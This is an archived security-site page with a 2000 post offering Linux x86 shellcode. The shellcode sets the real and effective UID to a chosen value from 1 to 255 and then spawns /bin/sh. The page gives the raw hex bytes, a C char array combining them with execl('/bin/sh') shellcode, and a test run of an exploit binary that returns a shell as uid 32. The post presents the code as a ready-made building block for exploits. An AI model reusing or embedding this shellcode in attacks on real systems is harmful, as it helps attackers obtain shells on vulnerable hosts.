what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

setreuid_1-255.asm

setreuid_1-255.asm
Posted Dec 15, 2000
Authored by vade79, realhalo | Site realhalo.org

Shellcode which does a setreuid before spawning a shell. Allows you to choose which UID / GID to use.

tags | shell, shellcode
systems | unix
SHA-256 | bab59cebad1397fb98c625b155e3892b60680d09a40410d2dae76cd0f4e43062

setreuid_1-255.asm

Change Mirror Download
(linux)asm[setreuid(?,?)]:  pre-made shellcode. by:  vade79/v9[v9@fakehalo.org]
.
-------------------------------------------------------------------------------
-

*** CODE:

since i did not see(i was looking) shellcode/asm for setreuid(nonroot,nonroot),
i made myself some shellcode for such a need(good old gdb). it will work for
uid values between 1-255(hex=0x01-0xff). so, here it is already put into hex:

0x29, 0xC0, 0xB0, 0x46, 0x29, 0xDB, 0xB3, 0x??, 0x89, 0xD9, 0xCD, 0x80.

replace 0x?? with the hex of your gid value, like 0x20 = uid32. (hex->ascii)

so, in typical format: "\x29\xc0\xb0\x46\x29\xdb\xb3\x20\x89\xd9\xcd\x80" would
give you uid/euid = 32.

and just append this to your typical shellcode to execute /bin/sh:

*** EXAMPLE CODE:

char setreuid_exec[]=
// setreuid(32, 32); (0x20=32)
"\x29\xc0\xb0\x46\x29\xdb\xb3\x20\x89\xd9\xcd\x80"
// execl("/bin/sh"); (with 0x01 of course :P)
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f\xb8\x1b\x56"
"\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80"
"\xe8\xd7\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x01";

*** TEST:

# ./test_exp
return address: 0xbffff544, offset: 500.
shell-init: could not get current directory: getwd: cannot access parent direct
ories
bash$ id
job-working-directory: could not get current directory: getwd: cannot access pa
rent directories
fakehalo: uid:32 gid:0. [euid:32 egid:0]
bash$

*** NOTE:

i don't think i'm the only one who will ever need this, so here it is for
others - save yourself some time. the ironic thing is, i forgot what i
originally wanted this shellcode for after i made it.

-- vade79 / v9@fakehalo.org / www.fakehalo.org->www.realhalo.org. --

Login or Register to add favorites

File Archive:

March 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    13 Files
  • 3
    Mar 3rd
    15 Files
  • 4
    Mar 4th
    0 Files
  • 5
    Mar 5th
    0 Files
  • 6
    Mar 6th
    16 Files
  • 7
    Mar 7th
    31 Files
  • 8
    Mar 8th
    16 Files
  • 9
    Mar 9th
    13 Files
  • 10
    Mar 10th
    9 Files
  • 11
    Mar 11th
    0 Files
  • 12
    Mar 12th
    0 Files
  • 13
    Mar 13th
    10 Files
  • 14
    Mar 14th
    6 Files
  • 15
    Mar 15th
    17 Files
  • 16
    Mar 16th
    22 Files
  • 17
    Mar 17th
    13 Files
  • 18
    Mar 18th
    0 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    16 Files
  • 21
    Mar 21st
    13 Files
  • 22
    Mar 22nd
    5 Files
  • 23
    Mar 23rd
    6 Files
  • 24
    Mar 24th
    47 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    50 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    7 Files
  • 30
    Mar 30th
    31 Files
  • 31
    Mar 31st
    15 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close